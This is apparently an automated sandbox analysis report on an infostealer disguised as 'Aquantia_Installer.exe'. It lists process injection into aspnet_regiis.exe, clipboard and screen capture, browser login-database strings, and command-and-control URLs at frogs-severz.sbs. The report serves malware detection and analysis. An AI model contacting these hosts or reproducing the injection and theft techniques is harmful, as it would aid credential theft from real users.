              Source: aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: aspnet_regiis.exe, 00000003.00000003.2133570080.000000000312F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2110879604.0000000003131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/
              Source: aspnet_regiis.exe, 00000003.00000003.2133641948.0000000003124000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/C
              Source: aspnet_regiis.exe, 00000003.00000003.2175264585.000000000314B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2230167539.000000000314B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2222804012.00000000030C7000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2224031177.000000000314A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068729204.0000000003133000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2162393319.000000000314B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2136223420.0000000003131000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2222480553.0000000003141000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068337960.000000000312F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2225798680.00000000030C7000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2136243200.0000000003134000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2223803833.0000000003146000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2110834644.000000000312E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2133570080.000000000312F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/api
              Source: aspnet_regiis.exe, 00000003.00000003.2089548297.0000000003131000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2110834644.000000000312E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2133570080.000000000312F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2110879604.0000000003131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/api#L
              Source: aspnet_regiis.exe, 00000003.00000003.2161739316.000000000315C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2175471255.0000000003158000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2162369698.000000000315C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2230318456.000000000315E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2157876608.000000000315C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2222676551.000000000315C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/api#O
              Source: aspnet_regiis.exe, 00000003.00000003.2162393319.000000000314B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/apii
              Source: aspnet_regiis.exe, 00000003.00000003.2110834644.000000000312E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/apixVebc
              Source: aspnet_regiis.exe, 00000003.00000002.2230294668.0000000003153000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/g
              Source: aspnet_regiis.exe, 00000003.00000003.2089548297.0000000003131000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2110834644.000000000312E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2110879604.0000000003131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs:443/apiAA3GM0RssN1u2sTrQHh4TeOMDePHoCR3hPAm7IHnVLLUAAAAAADoAAAAACAAAgAAAAVG
              Source: aspnet_regiis.exe, 00000003.00000003.2112354134.0000000003160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: aspnet_regiis.exe, 00000003.00000003.2112094316.00000000057FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: aspnet_regiis.exe, 00000003.00000003.2112094316.00000000057FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: aspnet_regiis.exe, 00000003.00000003.2112354134.0000000003160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
              Source: aspnet_regiis.exe, 00000003.00000003.2112354134.0000000003160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
              Source: aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: aspnet_regiis.exe, 00000003.00000003.2112094316.00000000057FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: aspnet_regiis.exe, 00000003.00000003.2112094316.00000000057FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: aspnet_regiis.exe, 00000003.00000003.2112094316.00000000057FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: aspnet_regiis.exe, 00000003.00000003.2112094316.00000000057FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: aspnet_regiis.exe, 00000003.00000003.2112094316.00000000057FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: aspnet_regiis.exe, 00000003.00000003.2112094316.00000000057FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.5:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.5:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.5:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.5:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.155.47:443 -> 192.168.2.5:49722 version: TLS 1.2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F83340 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_02F83340
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F83340 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_02F83340
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F842DC GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,3_2_02F842DC

              System Summary

              barindex
              Source: Aquantia_Installer.exeStatic PE information: section name: 4mh:*
              Source: Aquantia_Installer.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_6CF26CA0 WindowsHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,VirtualAlloc,CreateProcessW,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,VirtualAlloc,NtAllocateVirtualMemory,CloseHandle,CloseHandle,CloseHandle,0_2_6CF26CA0
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_6CF25C40 GetModuleHandleW,NtQueryInformationProcess,GetModuleHandleW,0_2_6CF25C40
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_0101F5000_2_0101F500
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_0101FF400_2_0101FF40
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_010315500_2_01031550
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_010063700_2_01006370
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_01041DA00_2_01041DA0
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_010201C00_2_010201C0
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_01032FD00_2_01032FD0
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_010417D00_2_010417D0
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_010391E00_2_010391E0
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_01009C000_2_01009C00
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_010098400_2_01009840
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_010212700_2_01021270
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_010386B00_2_010386B0
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_6CF26CA00_2_6CF26CA0
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_6CF25C400_2_6CF25C40
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_6CF213000_2_6CF21300
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_6CF210000_2_6CF21000
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_6CF241600_2_6CF24160
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_6CF389510_2_6CF38951
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_6CF266700_2_6CF26670
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_6CF2E2000_2_6CF2E200
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeCode function: 0_2_0103A4D00_2_0103A4D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F5C2923_2_02F5C292
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F6AA633_2_02F6AA63
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F74B093_2_02F74B09
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F891603_2_02F89160
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F7DEC93_2_02F7DEC9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F72E303_2_02F72E30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F70FE03_2_02F70FE0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F777803_2_02F77780
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F58CF03_2_02F58CF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F914B03_2_02F914B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F7CDBA3_2_02F7CDBA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F5DDA73_2_02F5DDA7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F91D203_2_02F91D20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F562F03_2_02F562F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F7F2F93_2_02F7F2F9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F52AE03_2_02F52AE0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F902703_2_02F90270
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F8724D3_2_02F8724D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F8C2303_2_02F8C230
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F91A303_2_02F91A30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F7DA133_2_02F7DA13
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F7D39E3_2_02F7D39E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F59B803_2_02F59B80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F7CB8C3_2_02F7CB8C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F793683_2_02F79368
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F6BB133_2_02F6BB13
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F7B8A03_2_02F7B8A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F7D0AF3_2_02F7D0AF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F888903_2_02F88890
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F868483_2_02F86848
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F6A0433_2_02F6A043
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F698483_2_02F69848
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F788163_2_02F78816
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F688103_2_02F68810
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F8780C3_2_02F8780C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F551F03_2_02F551F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F711F03_2_02F711F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F549BF3_2_02F549BF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F739A03_2_02F739A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F861A03_2_02F861A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F569803_2_02F56980
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F901703_2_02F90170
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F701403_2_02F70140
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F579203_2_02F57920
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F751103_2_02F75110
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F801053_2_02F80105
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F53EF03_2_02F53EF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F6FEC03_2_02F6FEC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F906A03_2_02F906A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F77E933_2_02F77E93
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F78E533_2_02F78E53
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F6C6583_2_02F6C658
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F886303_2_02F88630
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F7CDBA3_2_02F7CDBA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F6E6153_2_02F6E615
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F56E103_2_02F56E10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F76E103_2_02F76E10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F7CE0D3_2_02F7CE0D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F5AFF03_2_02F5AFF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F597C03_2_02F597C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F6CFC03_2_02F6CFC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F8FF903_2_02F8FF90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F82F503_2_02F82F50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F917503_2_02F91750
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F6D7003_2_02F6D700
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F534F03_2_02F534F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F55CE03_2_02F55CE0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F804DB3_2_02F804DB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F5B4D23_2_02F5B4D2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F814D03_2_02F814D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F7A4B03_2_02F7A4B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F6F4803_2_02F6F480
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F6CC803_2_02F6CC80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F6EC403_2_02F6EC40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F784303_2_02F78430
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F77C203_2_02F77C20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F89DD93_2_02F89DD9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F7E5963_2_02F7E596
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F8FD903_2_02F8FD90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F725103_2_02F72510
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 02F68800 appears 64 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 02F584E0 appears 46 times
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3716 -s 1224
              Source: Aquantia_Installer.exe, 00000000.00000000.2009798765.000000000108E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBenjaminFelixLiam.dYZeT vs Aquantia_Installer.exe
              Source: Aquantia_Installer.exe, 00000000.00000002.2351578827.000000000176E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Aquantia_Installer.exe
              Source: Aquantia_Installer.exeBinary or memory string: OriginalFilenameBenjaminFelixLiam.dYZeT vs Aquantia_Installer.exe
              Source: Aquantia_Installer.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: Aquantia_Installer.exeStatic PE information: Section: 4mh:* ZLIB complexity 1.0003170543721973
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/7@2/1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02F89160 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_02F89160
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeMutant created: NULL
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3716
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5652:120:WilError_03
              Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\0932aab7-42f5-4f68-96fc-3ffa2ee5357cJump to behavior
              Source: Aquantia_Installer.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: aspnet_regiis.exe, 00000003.00000003.2068475032.0000000005707000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068862830.00000000056E9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2089960755.0000000005702000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Aquantia_Installer.exeString found in binary or memory: -addpset
              Source: Aquantia_Installer.exeString found in binary or memory: -addfulltrust
              Source: Aquantia_Installer.exeString found in binary or memory: -addgroup
              Source: Aquantia_Installer.exeString found in binary or memory: -help
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeFile read: C:\Users\user\Desktop\Aquantia_Installer.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Aquantia_Installer.exe "C:\Users\user\Desktop\Aquantia_Installer.exe"
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3716 -s 1224
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Aquantia_Installer.exeSection loaded: amsi.dllJump to behavior
